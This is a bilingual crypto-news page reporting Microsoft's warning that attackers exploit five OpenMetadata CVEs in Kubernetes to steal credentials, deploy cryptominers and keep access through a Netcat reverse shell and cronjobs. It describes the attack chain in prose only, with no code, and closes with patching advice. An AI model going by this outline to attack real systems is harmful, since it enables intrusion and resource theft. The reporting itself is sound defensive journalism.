bitcoin
bitcoin

$98447.647686 USD

-0.19%

ethereum
ethereum

$3465.461048 USD

-1.15%

tether
tether

$0.999214 USD

-0.03%

xrp
xrp

$2.281533 USD

-2.20%

bnb
bnb

$700.245283 USD

0.72%

solana
solana

$198.074396 USD

1.03%

dogecoin
dogecoin

$0.329304 USD

-1.56%

usd-coin
usd-coin

$1.000128 USD

-0.01%

cardano
cardano

$0.910967 USD

-3.13%

tron
tron

$0.256592 USD

-0.40%

avalanche
avalanche

$40.317549 USD

-2.29%

chainlink
chainlink

$24.521286 USD

-0.85%

toncoin
toncoin

$5.948409 USD

2.59%

shiba-inu
shiba-inu

$0.000023 USD

-1.33%

sui
sui

$4.522918 USD

-1.85%

加密货币新闻

微软警告:网络犯罪分子利用 OpenMetadata 缺陷来挖掘加密货币

2024/04/19 05:53

3 月份披露的未修补的 OpenMetadata 漏洞正在被恶意行为者积极利用,以获取对 Kubernetes 环境的访问权限并安装加密挖掘恶意软件。这些漏洞允许攻击者绕过身份验证、获得远程代码执行并窃取 AWS 凭证以在受害者的资源上挖掘加密货币。 Microsoft 建议管理员将 OpenMetadata 映像更新到最新版本并实施强身份验证以减轻这些风险。

微软警告:网络犯罪分子利用 OpenMetadata 缺陷来挖掘加密货币

Cybercriminals Exploit OpenMetadata Vulnerabilities to Mine Cryptocurrency, Microsoft Warns

微软警告网络犯罪分子利用 OpenMetadata 漏洞挖掘加密货币

In a chilling exposé, Microsoft has unveiled a disturbing trend: cybercriminals are actively exploiting vulnerabilities in OpenMetadata, an open-source software suite, to mine cryptocurrency at the expense of unsuspecting victims. These exploits, which have been ongoing since early April, are targeting Kubernetes environments where OpenMetadata is deployed without the necessary security patches.

在一次令人不寒而栗的曝光中,微软揭露了一个令人不安的趋势:网络犯罪分子正在积极利用开源软件套件 OpenMetadata 中的漏洞来挖掘加密货币,而牺牲毫无戒心的受害者的利益。这些漏洞自 4 月初以来一直在持续,目标是部署 OpenMetadata 且没有必要的安全补丁的 Kubernetes 环境。

Unpatched OpenMetadata Systems: A Gateway for Malicious Actors

未打补丁的开放元数据系统:恶意行为者的门户

OpenMetadata vulnerabilities, disclosed in March, encompass a range of critical and high-severity flaws that can be exploited to bypass authentication and gain remote code execution (RCE) within OpenMetadata deployments. Microsoft's threat intelligence team has identified five specific CVEs that are being leveraged in these attacks:

3 月份披露的 OpenMetadata 漏洞包含一系列关键和高严重性缺陷,可利用这些缺陷绕过身份验证并在 OpenMetadata 部署中获得远程代码执行 (RCE)。 Microsoft 的威胁情报团队已确定这些攻击中利用的五个特定 CVE:

  • CVE-2024-28255: Critical improper authentication vulnerability (CVSS: 9.8)
  • CVE-2024-28847: High-severity code-injection vulnerability (CVSS: 8.8)
  • CVE-2024-28253: Critical code-injection vulnerability (CVSS: 9.4)
  • CVE-2024-28848: High-severity code-injection vulnerability (CVSS: 8.8)
  • CVE-2024-28254: OS command injection vulnerability (CVSS: 8.8)

These vulnerabilities provide attackers with a gateway into vulnerable systems, allowing them to penetrate OpenMetadata containers and execute malicious commands. The attackers' primary objective is to surreptitiously mine cryptocurrency using the victims' computing resources.

CVE-2024-28255:严重的不当身份验证漏洞(CVSS:9.8)CVE-2024-28847:高严重性代码注入漏洞(CVSS:8.8)CVE-2024-28253:严重的代码注入漏洞(CVSS:9.4)CVE -2024-28848:高严重性代码注入漏洞(CVSS:8.8)CVE-2024-28254:操作系统命令注入漏洞(CVSS:8.8)这些漏洞为攻击者提供了进入易受攻击系统的网关,使他们能够渗透 OpenMetadata 容器并执行恶意命令。攻击者的主要目标是利用受害者的计算资源秘密开采加密货币。

The Attack Sequence: A Step-by-Step Account

攻击序列:逐步说明

The attack sequence begins with attackers scanning for Kubernetes-based deployments of OpenMetadata that are exposed to the internet. Once they identify vulnerable systems, they exploit the unpatched CVEs to gain access to the container. From there, they execute a series of commands to gather intelligence about the victim's environment, including network and hardware configuration, OS version, and active users.

攻击序列首先由攻击者扫描暴露在互联网上的基于 Kubernetes 的 OpenMetadata 部署。一旦他们识别出易受攻击的系统,他们就会利用未修补的 CVE 来访问容器。从那里,他们执行一系列命令来收集有关受害者环境的情报,包括网络和硬件配置、操作系统版本和活跃用户。

"As part of the reconnaissance phase, the attackers read the environment variables of the workload," explained Microsoft security experts Hagai Ran Kestenberg and Yossi Weizman. "Those variables may contain connection strings and credentials for various services used for OpenMetadata operation, which could lead to lateral movement to additional resources."

“作为侦察阶段的一部分,攻击者读取工作负载的环境变量,”微软安全专家 Hagai Ran Kestenberg 和 Yossi Weizman 解释道。 “这些变量可能包含用于 OpenMetadata 操作的各种服务的连接字符串和凭据,这可能会导致横向移动到其他资源。”

Crypto-Malware Deployment and Remote Access

加密恶意软件部署和远程访问

Once they have gained a foothold, the attackers download crypto-mining malware from a remote server in China. In some cases, the attackers have even left behind a desperate plea, hoping to evoke sympathy from their victims:

一旦获得立足点,攻击者就会从中国的远程服务器下载加密货币挖矿恶意软件。在某些情况下,袭击者甚至留下绝望的恳求,希望引起受害者的同情:

"Hi man. I've seen several organizations report my Trojan recently. Please let me go. I want to buy a car. That's all. I don't want to hurt others. I can't help it. My family is very poor. In China, it's hard to buy a suite. I don't have any accommodation. I don't want to do anything illegal. Really, really if you are interested, you can give me XMR, my address is…"

“嗨,伙计。我最近看到几个组织报告了我的木马。请放过我。我想买一辆车。仅此而已。我不想伤害别人。我没办法。我的家人很在中国,很难买套房,我不想做任何违法的事情。真的,如果你有兴趣,你可以给我XMR,我的地址是……”

It remains unclear whether this sob story has swayed any victims into transferring Monero crypto-coins to the attackers.

目前尚不清楚这个悲惨的故事是否促使受害者将门罗币转移给攻击者。

After deploying the mining malware, the attackers establish a reverse shell connection using Netcat to maintain remote access to the container. Additionally, they install cronjobs for scheduling, ensuring that the malware will execute at predetermined times.

部署挖矿恶意软件后,攻击者使用 Netcat 建立反向 shell 连接,以维持对容器的远程访问。此外,他们还安装 cronjobs 进行调度,确保恶意软件在预定时间执行。

Protecting Against Crypto-Mining Exploits

防范加密货币挖矿漏洞

Microsoft strongly urges administrators running OpenMetadata workloads in their Kubernetes clusters to ensure that the image is up to date. If OpenMetadata is exposed to the internet, strong authentication measures should be implemented, and default credentials should be avoided.

Microsoft 强烈敦促管理员在其 Kubernetes 集群中运行 OpenMetadata 工作负载,以确保映像是最新的。如果 OpenMetadata 暴露在互联网上,则应实施强身份验证措施,并应避免默认凭据。

These vulnerabilities serve as a sobering reminder of the importance of timely security patching and the consequences of neglecting software updates. Organizations are advised to adopt a proactive approach to vulnerability management to mitigate the risks posed by malicious actors.

这些漏洞清醒地提醒我们及时修补安全补丁的重要性以及忽视软件更新的后果。建议组织采取主动的漏洞管理方法,以减轻恶意行为者带来的风险。

免责声明:info@kdj.com

The information provided is not trading advice. kdj.com does not assume any responsibility for any investments made based on the information provided in this article. Cryptocurrencies are highly volatile and it is highly recommended that you invest with caution after thorough research!

If you believe that the content used on this website infringes your copyright, please contact us immediately (info@kdj.com) and we will delete it promptly.

2024年12月26日 发表的其他文章